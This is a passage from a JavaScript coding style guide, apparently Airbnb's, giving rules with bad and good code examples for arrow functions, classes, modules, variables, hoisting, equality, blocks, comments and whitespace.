`A long string with the ${number}. It’s so long that we don’t want it to take up space on the .map line!`
));
// bad
[1, 2, 3].map(x => {
const y = x + 1;
return x * y;
});
// good
[1, 2, 3].map((x) => {
const y = x + 1;
return x * y;
});
```
<a name="arrows--confusing"></a><a name="8.5"></a>
- [8.5](#arrows--confusing) Avoid confusing arrow function syntax (`=>`) with comparison operators (`<=`, `>=`). eslint: [`no-confusing-arrow`](https://eslint.org/docs/rules/no-confusing-arrow)
```javascript
// bad
const itemHeight = (item) => item.height <= 256 ? item.largeSize : item.smallSize;
// bad
const itemHeight = (item) => item.height >= 256 ? item.largeSize : item.smallSize;
// good
const itemHeight = (item) => (item.height <= 256 ? item.largeSize : item.smallSize);
// good
const itemHeight = (item) => {
const { height, largeSize, smallSize } = item;
return height <= 256 ? largeSize : smallSize;
};
```
<a name="whitespace--implicit-arrow-linebreak"></a>
- [8.6](#whitespace--implicit-arrow-linebreak) Enforce the location of arrow function bodies with implicit returns. eslint: [`implicit-arrow-linebreak`](https://eslint.org/docs/rules/implicit-arrow-linebreak)
```javascript
// bad
(foo) =>
bar;
(foo) =>
(bar);
// good
(foo) => bar;
(foo) => (bar);
(foo) => (
bar
)
```
**[⬆ back to top](#table-of-contents)**
## Classes & Constructors
<a name="constructors--use-class"></a><a name="9.1"></a>
- [9.1](#constructors--use-class) Always use `class`. Avoid manipulating `prototype` directly.
> Why? `class` syntax is more concise and easier to reason about.
```javascript
// bad
function Queue(contents = []) {
this.queue = [...contents];
}
Queue.prototype.pop = function () {
const value = this.queue[0];
this.queue.splice(0, 1);
return value;
};
// good
class Queue {
constructor(contents = []) {
this.queue = [...contents];
}
pop() {
const value = this.queue[0];
this.queue.splice(0, 1);
return value;
}
}
```
<a name="constructors--extends"></a><a name="9.2"></a>
- [9.2](#constructors--extends) Use `extends` for inheritance.
> Why? It is a built-in way to inherit prototype functionality without breaking `instanceof`.
```javascript
// bad
const inherits = require('inherits');
function PeekableQueue(contents) {
Queue.apply(this, contents);
}
inherits(PeekableQueue, Queue);
PeekableQueue.prototype.peek = function () {
return this.queue[0];
};
// good
class PeekableQueue extends Queue {
peek() {
return this.queue[0];
}
}
```
<a name="constructors--chaining"></a><a name="9.3"></a>
- [9.3](#constructors--chaining) Methods can return `this` to help with method chaining.
```javascript
// bad
Jedi.prototype.jump = function () {
this.jumping = true;
return true;
};
Jedi.prototype.setHeight = function (height) {
this.height = height;
};
const luke = new Jedi();
luke.jump(); // => true
luke.setHeight(20); // => undefined
// good
class Jedi {
jump() {
this.jumping = true;
return this;
}
setHeight(height) {
this.height = height;
return this;
}
}
const luke = new Jedi();
luke.jump()
.setHeight(20);
```
<a name="constructors--tostring"></a><a name="9.4"></a>
- [9.4](#constructors--tostring) It’s okay to write a custom `toString()` method, just make sure it works successfully and causes no side effects.
```javascript
class Jedi {
constructor(options = {}) {
this.name = options.name || 'no name';
}
getName() {
return this.name;
}
toString() {
return `Jedi - ${this.getName()}`;
}
}
```
<a name="constructors--no-useless"></a><a name="9.5"></a>
- [9.5](#constructors--no-useless) Classes have a default constructor if one is not specified. An empty constructor function or one that just delegates to a parent class is unnecessary. eslint: [`no-useless-constructor`](https://eslint.org/docs/rules/no-useless-constructor)
```javascript
// bad
class Jedi {
constructor() {}
getName() {
return this.name;
}
}
// bad
class Rey extends Jedi {
constructor(...args) {
super(...args);
}
}
// good
class Rey extends Jedi {
constructor(...args) {
super(...args);
this.name = 'Rey';
}
}
```
<a name="classes--no-duplicate-members"></a>
- [9.6](#classes--no-duplicate-members) Avoid duplicate class members. eslint: [`no-dupe-class-members`](https://eslint.org/docs/rules/no-dupe-class-members)
> Why? Duplicate class member declarations will silently prefer the last one - having duplicates is almost certainly a bug.
```javascript
// bad
class Foo {
bar() { return 1; }
bar() { return 2; }
}
// good
class Foo {
bar() { return 1; }
}
// good
class Foo {
bar() { return 2; }
}
```
<a name="classes--methods-use-this"></a>
- [9.7](#classes--methods-use-this) Class methods should use `this` or be made into a static method unless an external library or framework requires using specific non-static methods. Being an instance method should indicate that it behaves differently based on properties of the receiver. eslint: [`class-methods-use-this`](https://eslint.org/docs/rules/class-methods-use-this)
```javascript
// bad
class Foo {
bar() {
console.log('bar');
}
}
// good - this is used
class Foo {
bar() {
console.log(this.bar);
}
}
// good - constructor is exempt
class Foo {
constructor() {
// ...
}
}
// good - static methods aren't expected to use this
class Foo {
static bar() {
console.log('bar');
}
}
```
**[⬆ back to top](#table-of-contents)**
## Modules
<a name="modules--use-them"></a><a name="10.1"></a>
- [10.1](#modules--use-them) Always use modules (`import`/`export`) over a non-standard module system. You can always transpile to your preferred module system.
> Why? Modules are the future, let’s start using the future now.
```javascript
// bad
const AirbnbStyleGuide = require('./AirbnbStyleGuide');
module.exports = AirbnbStyleGuide.es6;
// ok
import AirbnbStyleGuide from './AirbnbStyleGuide';
export default AirbnbStyleGuide.es6;
// best
import { es6 } from './AirbnbStyleGuide';
export default es6;
```
<a name="modules--no-wildcard"></a><a name="10.2"></a>
- [10.2](#modules--no-wildcard) Do not use wildcard imports.
> Why? This makes sure you have a single default export.
```javascript
// bad
import * as AirbnbStyleGuide from './AirbnbStyleGuide';
// good
import AirbnbStyleGuide from './AirbnbStyleGuide';
```
<a name="modules--no-export-from-import"></a><a name="10.3"></a>
- [10.3](#modules--no-export-from-import) And do not export directly from an import.
> Why? Although the one-liner is concise, having one clear way to import and one clear way to export makes things consistent.
```javascript
// bad
// filename es6.js
export { es6 as default } from './AirbnbStyleGuide';
// good
// filename es6.js
import { es6 } from './AirbnbStyleGuide';
export default es6;
```
<a name="modules--no-duplicate-imports"></a>
- [10.4](#modules--no-duplicate-imports) Only import from a path in one place.
eslint: [`no-duplicate-imports`](https://eslint.org/docs/rules/no-duplicate-imports)
> Why? Having multiple lines that import from the same path can make code harder to maintain.
```javascript
// bad
import foo from 'foo';
// … some other imports … //
import { named1, named2 } from 'foo';
// good
import foo, { named1, named2 } from 'foo';
// good
import foo, {
named1,
named2,
} from 'foo';
```
<a name="modules--no-mutable-exports"></a>
- [10.5](#modules--no-mutable-exports) Do not export mutable bindings.
eslint: [`import/no-mutable-exports`](https://github.com/import-js/eslint-plugin-import/blob/master/docs/rules/no-mutable-exports.md)
> Why? Mutation should be avoided in general, but in particular when exporting mutable bindings. While this technique may be needed for some special cases, in general, only constant references should be exported.
```javascript
// bad
let foo = 3;
export { foo };
// good
const foo = 3;
export { foo };
```
<a name="modules--prefer-default-export"></a>
- [10.6](#modules--prefer-default-export) In modules with a single export, prefer default export over named export.
eslint: [`import/prefer-default-export`](https://github.com/import-js/eslint-plugin-import/blob/master/docs/rules/prefer-default-export.md)
> Why? To encourage more files that only ever export one thing, which is better for readability and maintainability.
```javascript
// bad
export function foo() {}
// good
export default function foo() {}
```
<a name="modules--imports-first"></a>
- [10.7](#modules--imports-first) Put all `import`s above non-import statements.
eslint: [`import/first`](https://github.com/import-js/eslint-plugin-import/blob/master/docs/rules/first.md)
> Why? Since `import`s are hoisted, keeping them all at the top prevents surprising behavior.
```javascript
// bad
import foo from 'foo';
foo.init();
import bar from 'bar';
// good
import foo from 'foo';
import bar from 'bar';
foo.init();
```
<a name="modules--multiline-imports-over-newlines"></a>
- [10.8](#modules--multiline-imports-over-newlines) Multiline imports should be indented just like multiline array and object literals.
eslint: [`object-curly-newline`](https://eslint.org/docs/rules/object-curly-newline)
> Why? The curly braces follow the same indentation rules as every other curly brace block in the style guide, as do the trailing commas.
```javascript
// bad
import {longNameA, longNameB, longNameC, longNameD, longNameE} from 'path';
// good
import {
longNameA,
longNameB,
longNameC,
longNameD,
longNameE,
} from 'path';
```
<a name="modules--no-webpack-loader-syntax"></a>
- [10.9](#modules--no-webpack-loader-syntax) Disallow Webpack loader syntax in module import statements.
eslint: [`import/no-webpack-loader-syntax`](https://github.com/import-js/eslint-plugin-import/blob/master/docs/rules/no-webpack-loader-syntax.md)
> Why? Since using Webpack syntax in the imports couples the code to a module bundler. Prefer using the loader syntax in `webpack.config.js`.
```javascript
// bad
import fooSass from 'css!sass!foo.scss';
import barCss from 'style!css!bar.css';
// good
import fooSass from 'foo.scss';
import barCss from 'bar.css';
```
<a name="modules--import-extensions"></a>
- [10.10](#modules--import-extensions) Do not include JavaScript filename extensions
eslint: [`import/extensions`](https://github.com/import-js/eslint-plugin-import/blob/master/docs/rules/extensions.md)
> Why? Including extensions inhibits refactoring, and inappropriately hardcodes implementation details of the module you're importing in every consumer.
```javascript
// bad
import foo from './foo.js';
import bar from './bar.jsx';
import baz from './baz/index.jsx';
// good
import foo from './foo';
import bar from './bar';
import baz from './baz';
```
**[⬆ back to top](#table-of-contents)**
## Iterators and Generators
<a name="iterators--nope"></a><a name="11.1"></a>
- [11.1](#iterators--nope) Don’t use iterators. Prefer JavaScript’s higher-order functions instead of loops like `for-in` or `for-of`. eslint: [`no-iterator`](https://eslint.org/docs/rules/no-iterator) [`no-restricted-syntax`](https://eslint.org/docs/rules/no-restricted-syntax)
> Why? This enforces our immutable rule. Dealing with pure functions that return values is easier to reason about than side effects.
> Use `map()` / `every()` / `filter()` / `find()` / `findIndex()` / `reduce()` / `some()` / ... to iterate over arrays, and `Object.keys()` / `Object.values()` / `Object.entries()` to produce arrays so you can iterate over objects.
```javascript
const numbers = [1, 2, 3, 4, 5];
// bad
let sum = 0;
for (let num of numbers) {
sum += num;
}
sum === 15;
// good
let sum = 0;
numbers.forEach((num) => {
sum += num;
});
sum === 15;
// best (use the functional force)
const sum = numbers.reduce((total, num) => total + num, 0);
sum === 15;
// bad
const increasedByOne = [];
for (let i = 0; i < numbers.length; i++) {
increasedByOne.push(numbers[i] + 1);
}
// good
const increasedByOne = [];
numbers.forEach((num) => {
increasedByOne.push(num + 1);
});
// best (keeping it functional)
const increasedByOne = numbers.map((num) => num + 1);
```
<a name="generators--nope"></a><a name="11.2"></a>
- [11.2](#generators--nope) Don’t use generators for now.
> Why? They don’t transpile well to ES5.
<a name="generators--spacing"></a>
- [11.3](#generators--spacing) If you must use generators, or if you disregard [our advice](#generators--nope), make sure their function signature is spaced properly. eslint: [`generator-star-spacing`](https://eslint.org/docs/rules/generator-star-spacing)
> Why? `function` and `*` are part of the same conceptual keyword - `*` is not a modifier for `function`, `function*` is a unique construct, different from `function`.
```javascript
// bad
function * foo() {
// ...
}
// bad
const bar = function * () {
// ...
};
// bad
const baz = function *() {
// ...
};
// bad
const quux = function*() {
// ...
};
// bad
function*foo() {
// ...
}
// bad
function *foo() {
// ...
}
// very bad
function
*
foo() {
// ...
}
// very bad
const wat = function
*
() {
// ...
};
// good
function* foo() {
// ...
}
// good
const foo = function* () {
// ...
};
```
**[⬆ back to top](#table-of-contents)**
## Properties
<a name="properties--dot"></a><a name="12.1"></a>
- [12.1](#properties--dot) Use dot notation when accessing properties. eslint: [`dot-notation`](https://eslint.org/docs/rules/dot-notation)
```javascript
const luke = {
jedi: true,
age: 28,
};
// bad
const isJedi = luke['jedi'];
// good
const isJedi = luke.jedi;
```
<a name="properties--bracket"></a><a name="12.2"></a>
- [12.2](#properties--bracket) Use bracket notation `[]` when accessing properties with a variable.
```javascript
const luke = {
jedi: true,
age: 28,
};
function getProp(prop) {
return luke[prop];
}
const isJedi = getProp('jedi');
```
<a name="es2016-properties--exponentiation-operator"></a>
- [12.3](#es2016-properties--exponentiation-operator) Use exponentiation operator `**` when calculating exponentiations. eslint: [`prefer-exponentiation-operator`](https://eslint.org/docs/rules/prefer-exponentiation-operator).
```javascript
// bad
const binary = Math.pow(2, 10);
// good
const binary = 2 ** 10;
```
**[⬆ back to top](#table-of-contents)**
## Variables
<a name="variables--const"></a><a name="13.1"></a>
- [13.1](#variables--const) Always use `const` or `let` to declare variables. Not doing so will result in global variables. We want to avoid polluting the global namespace. Captain Planet warned us of that. eslint: [`no-undef`](https://eslint.org/docs/rules/no-undef) [`prefer-const`](https://eslint.org/docs/rules/prefer-const)
```javascript
// bad
superPower = new SuperPower();
// good
const superPower = new SuperPower();
```
<a name="variables--one-const"></a><a name="13.2"></a>
- [13.2](#variables--one-const) Use one `const` or `let` declaration per variable or assignment. eslint: [`one-var`](https://eslint.org/docs/rules/one-var)
> Why? It’s easier to add new variable declarations this way, and you never have to worry about swapping out a `;` for a `,` or introducing punctuation-only diffs. You can also step through each declaration with the debugger, instead of jumping through all of them at once.
```javascript
// bad
const items = getItems(),
goSportsTeam = true,
dragonball = 'z';
// bad
// (compare to above, and try to spot the mistake)
const items = getItems(),
goSportsTeam = true;
dragonball = 'z';
// good
const items = getItems();
const goSportsTeam = true;
const dragonball = 'z';
```
<a name="variables--const-let-group"></a><a name="13.3"></a>
- [13.3](#variables--const-let-group) Group all your `const`s and then group all your `let`s.
> Why? This is helpful when later on you might need to assign a variable depending on one of the previously assigned variables.
```javascript
// bad
let i, len, dragonball,
items = getItems(),
goSportsTeam = true;
// bad
let i;
const items = getItems();
let dragonball;
const goSportsTeam = true;
let len;
// good
const goSportsTeam = true;
const items = getItems();
let dragonball;
let i;
let length;
```
<a name="variables--define-where-used"></a><a name="13.4"></a>
- [13.4](#variables--define-where-used) Assign variables where you need them, but place them in a reasonable place.
> Why? `let` and `const` are block scoped and not function scoped.
```javascript
// bad - unnecessary function call
function checkName(hasName) {
const name = getName();
if (hasName === 'test') {
return false;
}
if (name === 'test') {
this.setName('');
return false;
}
return name;
}
// good
function checkName(hasName) {
if (hasName === 'test') {
return false;
}
const name = getName();
if (name === 'test') {
this.setName('');
return false;
}
return name;
}
```
<a name="variables--no-chain-assignment"></a><a name="13.5"></a>
- [13.5](#variables--no-chain-assignment) Don’t chain variable assignments. eslint: [`no-multi-assign`](https://eslint.org/docs/rules/no-multi-assign)
> Why? Chaining variable assignments creates implicit global variables.
```javascript
// bad
(function example() {
// JavaScript interprets this as
// let a = ( b = ( c = 1 ) );
// The let keyword only applies to variable a; variables b and c become
// global variables.
let a = b = c = 1;
}());
console.log(a); // throws ReferenceError
console.log(b); // 1
console.log(c); // 1
// good
(function example() {
let a = 1;
let b = a;
let c = a;
}());
console.log(a); // throws ReferenceError
console.log(b); // throws ReferenceError
console.log(c); // throws ReferenceError
// the same applies for `const`
```
<a name="variables--unary-increment-decrement"></a><a name="13.6"></a>
- [13.6](#variables--unary-increment-decrement) Avoid using unary increments and decrements (`++`, `--`). eslint [`no-plusplus`](https://eslint.org/docs/rules/no-plusplus)
> Why? Per the eslint documentation, unary increment and decrement statements are subject to automatic semicolon insertion and can cause silent errors with incrementing or decrementing values within an application. It is also more expressive to mutate your values with statements like `num += 1` instead of `num++` or `num ++`. Disallowing unary increment and decrement statements also prevents you from pre-incrementing/pre-decrementing values unintentionally which can also cause unexpected behavior in your programs.
```javascript
// bad
const array = [1, 2, 3];
let num = 1;
num++;
--num;
let sum = 0;
let truthyCount = 0;
for (let i = 0; i < array.length; i++) {
let value = array[i];
sum += value;
if (value) {
truthyCount++;
}
}
// good
const array = [1, 2, 3];
let num = 1;
num += 1;
num -= 1;
const sum = array.reduce((a, b) => a + b, 0);
const truthyCount = array.filter(Boolean).length;
```
<a name="variables--linebreak"></a>
- [13.7](#variables--linebreak) Avoid linebreaks before or after `=` in an assignment. If your assignment violates [`max-len`](https://eslint.org/docs/rules/max-len), surround the value in parens. eslint [`operator-linebreak`](https://eslint.org/docs/rules/operator-linebreak).
> Why? Linebreaks surrounding `=` can obfuscate the value of an assignment.
```javascript
// bad
const foo =
superLongLongLongLongLongLongLongLongFunctionName();
// bad
const foo
= 'superLongLongLongLongLongLongLongLongString';
// good
const foo = (
superLongLongLongLongLongLongLongLongFunctionName()
);
// good
const foo = 'superLongLongLongLongLongLongLongLongString';
```
<a name="variables--no-unused-vars"></a>
- [13.8](#variables--no-unused-vars) Disallow unused variables. eslint: [`no-unused-vars`](https://eslint.org/docs/rules/no-unused-vars)
> Why? Variables that are declared and not used anywhere in the code are most likely an error due to incomplete refactoring. Such variables take up space in the code and can lead to confusion by readers.
```javascript
// bad
const some_unused_var = 42;
// Write-only variables are not considered as used.
let y = 10;
y = 5;
// A read for a modification of itself is not considered as used.
let z = 0;
z = z + 1;
// Unused function arguments.
function getX(x, y) {
return x;
}
// good
function getXPlusY(x, y) {
return x + y;
}
const x = 1;
const y = a + 2;
alert(getXPlusY(x, y));
// 'type' is ignored even if unused because it has a rest property sibling.
// This is a form of extracting an object that omits the specified keys.
const { type, ...coords } = data;
// 'coords' is now the 'data' object without its 'type' property.
```
**[⬆ back to top](#table-of-contents)**
## Hoisting
<a name="hoisting--about"></a><a name="14.1"></a>
- [14.1](#hoisting--about) `var` declarations get hoisted to the top of their closest enclosing function scope, their assignment does not. `const` and `let` declarations are blessed with a new concept called [Temporal Dead Zones (TDZ)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/let#temporal_dead_zone_tdz). It’s important to know why [typeof is no longer safe](https://web.archive.org/web/20200121061528/http://es-discourse.com/t/why-typeof-is-no-longer-safe/15).
```javascript
// we know this wouldn’t work (assuming there
// is no notDefined global variable)
function example() {
console.log(notDefined); // => throws a ReferenceError
}
// creating a variable declaration after you
// reference the variable will work due to
// variable hoisting. Note: the assignment
// value of `true` is not hoisted.
function example() {
console.log(declaredButNotAssigned); // => undefined
var declaredButNotAssigned = true;
}
// the interpreter is hoisting the variable
// declaration to the top of the scope,
// which means our example could be rewritten as:
function example() {
let declaredButNotAssigned;
console.log(declaredButNotAssigned); // => undefined
declaredButNotAssigned = true;
}
// using const and let
function example() {
console.log(declaredButNotAssigned); // => throws a ReferenceError
console.log(typeof declaredButNotAssigned); // => throws a ReferenceError
const declaredButNotAssigned = true;
}
```
<a name="hoisting--anon-expressions"></a><a name="14.2"></a>
- [14.2](#hoisting--anon-expressions) Anonymous function expressions hoist their variable name, but not the function assignment.
```javascript
function example() {
console.log(anonymous); // => undefined
anonymous(); // => TypeError anonymous is not a function
var anonymous = function () {
console.log('anonymous function expression');
};
}
```
<a name="hoisting--named-expresions"></a><a name="hoisting--named-expressions"></a><a name="14.3"></a>
- [14.3](#hoisting--named-expressions) Named function expressions hoist the variable name, not the function name or the function body.
```javascript
function example() {
console.log(named); // => undefined
named(); // => TypeError named is not a function
superPower(); // => ReferenceError superPower is not defined
var named = function superPower() {
console.log('Flying');
};
}
// the same is true when the function name
// is the same as the variable name.
function example() {
console.log(named); // => undefined
named(); // => TypeError named is not a function
var named = function named() {
console.log('named');
};
}
```
<a name="hoisting--declarations"></a><a name="14.4"></a>
- [14.4](#hoisting--declarations) Function declarations hoist their name and the function body.
```javascript
function example() {
superPower(); // => Flying
function superPower() {
console.log('Flying');
}
}
```
<a name="no-use-before-define"></a>
- [14.5](#no-use-before-define) Variables, classes, and functions should be defined before they can be used. eslint: [`no-use-before-define`](https://eslint.org/docs/latest/rules/no-use-before-define)
> Why? When variables, classes, or functions are declared after being used, it can harm readability since a reader won't know what a thing that's referenced is. It's much clearer for a reader to first encounter the source of a thing (whether imported from another module, or defined in the file) before encountering a use of the thing.
```javascript
// bad
// Variable a is being used before it is being defined.
console.log(a); // this will be undefined, since while the declaration is hoisted, the initialization is not
var a = 10;
// Function fun is being called before being defined.
fun();
function fun() {}
// Class A is being used before being defined.
new A(); // ReferenceError: Cannot access 'A' before initialization
class A {
}
// `let` and `const` are hoisted, but they don't have a default initialization.
// The variables 'a' and 'b' are in a Temporal Dead Zone where JavaScript
// knows they exist (declaration is hoisted) but they are not accessible
// (as they are not yet initialized).
console.log(a); // ReferenceError: Cannot access 'a' before initialization
console.log(b); // ReferenceError: Cannot access 'b' before initialization
let a = 10;
const b = 5;
// good
var a = 10;
console.log(a); // 10
function fun() {}
fun();
class A {
}
new A();
let a = 10;
const b = 5;
console.log(a); // 10
console.log(b); // 5
```
- For more information refer to [JavaScript Scoping & Hoisting](https://www.adequatelygood.com/2010/2/JavaScript-Scoping-and-Hoisting/) by [Ben Cherry](https://www.adequatelygood.com/).
**[⬆ back to top](#table-of-contents)**
## Comparison Operators & Equality
<a name="comparison--eqeqeq"></a><a name="15.1"></a>
- [15.1](#comparison--eqeqeq) Use `===` and `!==` over `==` and `!=`. eslint: [`eqeqeq`](https://eslint.org/docs/rules/eqeqeq)
<a name="comparison--if"></a><a name="15.2"></a>
- [15.2](#comparison--if) Conditional statements such as the `if` statement evaluate their expression using coercion with the `ToBoolean` abstract method and always follow these simple rules:
- **Objects** evaluate to **true**
- **Undefined** evaluates to **false**
- **Null** evaluates to **false**
- **Booleans** evaluate to **the value of the boolean**
- **Numbers** evaluate to **false** if **+0, -0, or NaN**, otherwise **true**
- **Strings** evaluate to **false** if an empty string `''`, otherwise **true**
```javascript
if ([0] && []) {
// true
// an array (even an empty one) is an object, objects will evaluate to true
}
```
<a name="comparison--shortcuts"></a><a name="15.3"></a>
- [15.3](#comparison--shortcuts) Use shortcuts for booleans, but explicit comparisons for strings and numbers.
```javascript
// bad
if (isValid === true) {
// ...
}
// good
if (isValid) {
// ...
}
// bad
if (name) {
// ...
}
// good
if (name !== '') {
// ...
}
// bad
if (collection.length) {
// ...
}
// good
if (collection.length > 0) {
// ...
}
```
<a name="comparison--moreinfo"></a><a name="15.4"></a>
- [15.4](#comparison--moreinfo) For more information see [Truth, Equality, and JavaScript](https://javascriptweblog.wordpress.com/2011/02/07/truth-equality-and-javascript/#more-2108) by Angus Croll.
<a name="comparison--switch-blocks"></a><a name="15.5"></a>
- [15.5](#comparison--switch-blocks) Use braces to create blocks in `case` and `default` clauses that contain lexical declarations (e.g. `let`, `const`, `function`, and `class`). eslint: [`no-case-declarations`](https://eslint.org/docs/rules/no-case-declarations)
> Why? Lexical declarations are visible in the entire `switch` block but only get initialized when assigned, which only happens when its `case` is reached. This causes problems when multiple `case` clauses attempt to define the same thing.
```javascript
// bad
switch (foo) {
case 1:
let x = 1;
break;
case 2:
const y = 2;
break;
case 3:
function f() {
// ...
}
break;
default:
class C {}
}
// good
switch (foo) {
case 1: {
let x = 1;
break;
}
case 2: {
const y = 2;
break;
}
case 3: {
function f() {
// ...
}
break;
}
case 4:
bar();
break;
default: {
class C {}
}
}
```
<a name="comparison--nested-ternaries"></a><a name="15.6"></a>
- [15.6](#comparison--nested-ternaries) Ternaries should not be nested and generally be single line expressions. eslint: [`no-nested-ternary`](https://eslint.org/docs/rules/no-nested-ternary)
```javascript
// bad
const foo = maybe1 > maybe2
? "bar"
: value1 > value2 ? "baz" : null;
// split into 2 separated ternary expressions
const maybeNull = value1 > value2 ? 'baz' : null;
// better
const foo = maybe1 > maybe2
? 'bar'
: maybeNull;
// best
const foo = maybe1 > maybe2 ? 'bar' : maybeNull;
```
<a name="comparison--unneeded-ternary"></a><a name="15.7"></a>
- [15.7](#comparison--unneeded-ternary) Avoid unneeded ternary statements. eslint: [`no-unneeded-ternary`](https://eslint.org/docs/rules/no-unneeded-ternary)
```javascript
// bad
const foo = a ? a : b;
const bar = c ? true : false;
const baz = c ? false : true;
const quux = a != null ? a : b;
// good
const foo = a || b;
const bar = !!c;
const baz = !c;
const quux = a ?? b;
```
<a name="comparison--no-mixed-operators"></a>
- [15.8](#comparison--no-mixed-operators) When mixing operators, enclose them in parentheses. The only exception is the standard arithmetic operators: `+`, `-`, and `**` since their precedence is broadly understood. We recommend enclosing `/` and `*` in parentheses because their precedence can be ambiguous when they are mixed.
eslint: [`no-mixed-operators`](https://eslint.org/docs/rules/no-mixed-operators)
> Why? This improves readability and clarifies the developer’s intention.
```javascript
// bad
const foo = a && b < 0 || c > 0 || d + 1 === 0;
// bad
const bar = a ** b - 5 % d;
// bad
// one may be confused into thinking (a || b) && c
if (a || b && c) {
return d;
}
// bad
const bar = a + b / c * d;
// good
const foo = (a && b < 0) || c > 0 || (d + 1 === 0);
// good
const bar = a ** b - (5 % d);
// good
if (a || (b && c)) {
return d;
}
// good
const bar = a + (b / c) * d;
```
<a name="nullish-coalescing-operator"></a>
- [15.9](#nullish-coalescing-operator) The nullish coalescing operator (`??`) is a logical operator that returns its right-hand side operand when its left-hand side operand is `null` or `undefined`. Otherwise, it returns the left-hand side operand.
> Why? It provides precision by distinguishing null/undefined from other falsy values, enhancing code clarity and predictability.
```javascript
// bad
const value = 0 ?? 'default';
// returns 0, not 'default'
// bad
const value = '' ?? 'default';
// returns '', not 'default'
// good
const value = null ?? 'default';
// returns 'default'
// good
const user = {
name: 'John',
age: null
};
const age = user.age ?? 18;
// returns 18
```
**[⬆ back to top](#table-of-contents)**
## Blocks
<a name="blocks--braces"></a><a name="16.1"></a>
- [16.1](#blocks--braces) Use braces with all multiline blocks. eslint: [`nonblock-statement-body-position`](https://eslint.org/docs/rules/nonblock-statement-body-position)
```javascript
// bad
if (test)
return false;
// good
if (test) return false;
// good
if (test) {
return false;
}
// bad
function foo() { return false; }
// good
function bar() {
return false;
}
```
<a name="blocks--cuddled-elses"></a><a name="16.2"></a>
- [16.2](#blocks--cuddled-elses) If you’re using multiline blocks with `if` and `else`, put `else` on the same line as your `if` block’s closing brace. eslint: [`brace-style`](https://eslint.org/docs/rules/brace-style)
```javascript
// bad
if (test) {
thing1();
thing2();
}
else {
thing3();
}
// good
if (test) {
thing1();
thing2();
} else {
thing3();
}
```
<a name="blocks--no-else-return"></a><a name="16.3"></a>
- [16.3](#blocks--no-else-return) If an `if` block always executes a `return` statement, the subsequent `else` block is unnecessary. A `return` in an `else if` block following an `if` block that contains a `return` can be separated into multiple `if` blocks. eslint: [`no-else-return`](https://eslint.org/docs/rules/no-else-return)
```javascript
// bad
function foo() {
if (x) {
return x;
} else {
return y;
}
}
// bad
function cats() {
if (x) {
return x;
} else if (y) {
return y;
}
}
// bad
function dogs() {
if (x) {
return x;
} else {
if (y) {
return y;
}
}
}
// good
function foo() {
if (x) {
return x;
}
return y;
}
// good
function cats() {
if (x) {
return x;
}
if (y) {
return y;
}
}
// good
function dogs(x) {
if (x) {
if (z) {
return y;
}
} else {
return z;
}
}
```
**[⬆ back to top](#table-of-contents)**
## Control Statements
<a name="control-statements"></a>
- [17.1](#control-statements) In case your control statement (`if`, `while` etc.) gets too long or exceeds the maximum line length, each (grouped) condition could be put into a new line. The logical operator should begin the line.
> Why? Requiring operators at the beginning of the line keeps the operators aligned and follows a pattern similar to method chaining. This also improves readability by making it easier to visually follow complex logic.
```javascript
// bad
if ((foo === 123 || bar === 'abc') && doesItLookGoodWhenItBecomesThatLong() && isThisReallyHappening()) {
thing1();
}
// bad
if (foo === 123 &&
bar === 'abc') {
thing1();
}
// bad
if (foo === 123
&& bar === 'abc') {
thing1();
}
// bad
if (
foo === 123 &&
bar === 'abc'
) {
thing1();
}
// good
if (
foo === 123
&& bar === 'abc'
) {
thing1();
}
// good
if (
(foo === 123 || bar === 'abc')
&& doesItLookGoodWhenItBecomesThatLong()
&& isThisReallyHappening()
) {
thing1();
}
// good
if (foo === 123 && bar === 'abc') {
thing1();
}
```
<a name="control-statement--value-selection"></a><a name="control-statements--value-selection"></a>
- [17.2](#control-statements--value-selection) Don't use selection operators in place of control statements.
```javascript
// bad
!isRunning && startRunning();
// good
if (!isRunning) {
startRunning();
}
```
**[⬆ back to top](#table-of-contents)**
## Comments
<a name="comments--multiline"></a><a name="17.1"></a>
- [18.1](#comments--multiline) Use `/** ... */` for multiline comments.
```javascript
// bad
// make() returns a new element
// based on the passed in tag name
//
// @param {String} tag
// @return {Element} element
function make(tag) {
// ...
return element;
}
// good
/**
* make() returns a new element
* based on the passed-in tag name
*/
function make(tag) {
// ...
return element;
}
```
<a name="comments--singleline"></a><a name="17.2"></a>
- [18.2](#comments--singleline) Use `//` for single line comments. Place single line comments on a newline above the subject of the comment. Put an empty line before the comment unless it’s on the first line of a block.
```javascript
// bad
const active = true; // is current tab
// good
// is current tab
const active = true;
// bad
function getType() {
console.log('fetching type...');
// set the default type to 'no type'
const type = this.type || 'no type';
return type;
}
// good
function getType() {
console.log('fetching type...');
// set the default type to 'no type'
const type = this.type || 'no type';
return type;
}
// also good
function getType() {
// set the default type to 'no type'
const type = this.type || 'no type';
return type;
}
```
<a name="comments--spaces"></a>
- [18.3](#comments--spaces) Start all comments with a space to make it easier to read. eslint: [`spaced-comment`](https://eslint.org/docs/rules/spaced-comment)
```javascript
// bad
//is current tab
const active = true;
// good
// is current tab
const active = true;
// bad
/**
*make() returns a new element
*based on the passed-in tag name
*/
function make(tag) {
// ...
return element;
}
// good
/**
* make() returns a new element
* based on the passed-in tag name
*/
function make(tag) {
// ...
return element;
}
```
<a name="comments--actionitems"></a><a name="17.3"></a>
- [18.4](#comments--actionitems) Prefixing your comments with `FIXME` or `TODO` helps other developers quickly understand if you’re pointing out a problem that needs to be revisited, or if you’re suggesting a solution to the problem that needs to be implemented. These are different than regular comments because they are actionable. The actions are `FIXME: -- need to figure this out` or `TODO: -- need to implement`.
<a name="comments--fixme"></a><a name="17.4"></a>
- [18.5](#comments--fixme) Use `// FIXME:` to annotate problems.
```javascript
class Calculator extends Abacus {
constructor() {
super();
// FIXME: shouldn’t use a global here
total = 0;
}
}
```
<a name="comments--todo"></a><a name="17.5"></a>
- [18.6](#comments--todo) Use `// TODO:` to annotate solutions to problems.
```javascript
class Calculator extends Abacus {
constructor() {
super();
// TODO: total should be configurable by an options param
this.total = 0;
}
}
```
**[⬆ back to top](#table-of-contents)**
## Whitespace
<a name="whitespace--spaces"></a><a name="18.1"></a>
- [19.1](#whitespace--spaces) Use soft tabs (space character) set to 2 spaces. eslint: [`indent`](https://eslint.org/docs/rules/indent)
```javascript
// bad
function foo() {
∙∙∙∙let name;
}
// bad
function bar() {
∙let name;
}
// good
function baz() {
∙∙let name;
}
```
<a name="whitespace--before-blocks"></a><a name="18.2"></a>
- [19.2](#whitespace--before-blocks) Place 1 space before the leading brace. eslint: [`space-before-blocks`](https://eslint.org/docs/rules/space-before-blocks)
```javascript
// bad
